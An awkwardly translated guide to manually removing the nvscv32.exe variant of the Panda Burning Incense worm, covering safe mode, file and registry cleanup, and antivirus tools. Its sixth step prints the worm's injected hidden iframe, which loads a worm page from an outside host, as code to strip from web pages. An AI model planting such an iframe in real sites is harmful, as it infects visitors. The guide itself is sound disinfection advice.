Panda Incense Virus Nvscv32.exe Mutant manual removal scheme

Editor's note: Pconline offers a way to kill nvscv32.exe variants of panda incense virus. It was investigated that the variant appeared on 16th. The author has the honor of 17th with "Panda Incense virus Nvscv32.exe variant" intimate contact, and use the following methods to clear it. It is recommended that the first method be used.

I. Solutions provided by Pconline

1. Unplug the network cable;

2. Re-enter the WinXP Safe Mode, Panda incense virus process is not loaded, you can use the Task Manager! (Hint: Press and hold F8 after boot)

3. Delete virus file:%systemroot%\system32\drivers\nvscv32.exe.

4. Start Menu => run, run msconfig command. In the System Configuration Utility, cancel the process associated with Nvscv32.exe. You can also use the Super Bunny Magic Settings, HijackThis, and so on to remove the Nvscv32.exe registry startup entry.

To cancel the start of the panda burning incense virus process

5. Download and use the Jiangmin tool to repair the infected EXE file. and promptly hit the Windows patch.

6. Clear html/asp/php and so on, all Web page files in the following code: (to prevent the spread of the code has three modifications, please ". "Change to". ）

<iframe src=http://www. Krvkr. Com/worm. HTM _fcksavedurl= "http://www. Krvkr. Com/worm. HTM "width=" 0 "height=" 0 "></iframe>

How to bulk clear malicious code:

You can use bulk substitution of Dreamweaver.

How to use Dreamweaver batch substitution

can be downloaded using batchtextreplacer bulk replacement.

Deploy the Symantec Antivirus Enterprise, upgrade to the latest virus library scan the overall file, you can clear the added malicious code and clean up the virus files.

7. Install anti-virus software, and upgrade the virus library, scan the entire hard drive, clear other virus files. Recommended Pconline several times recommended "free Kaspersky"--active Virus sheild. (xxxxxxxxxxxxx) (Note: Step 7 cannot be swapped with step 5 to prevent the repair of the poisoned files from being deleted!) ）

8. Delete the Autorun.inf files in each packing directory, and use the search function to remove all desktop_.ini.

Ii. the solution provided by the interconnection safety net (the following virus description, poisoning phenomenon and technical analysis are all from the interconnection safety net)

1: Turn off the network share and disconnect the network.

2: Use IceSword to end off Nvscv32.exe process (fast, Rob before virus infection IceSword)

3:hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall The CheckedValue value is changed to 1.

4: Delete Registry Startup entry

[Hkey_current_user\software\microsoft\windows\currentversion\run\]

NVSCV32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

5: Delete C:\WINDOWS\system32\drivers\nvscv32.exe

6: Delete the Autorun.inf files and setup.exe files in each packing directory, and use the search function to remove all desktop_.ini.

7: If there is a script file on the computer, remove all the virus code.

8: Turn off the automatic playback function of the system.

This will basically clear the virus.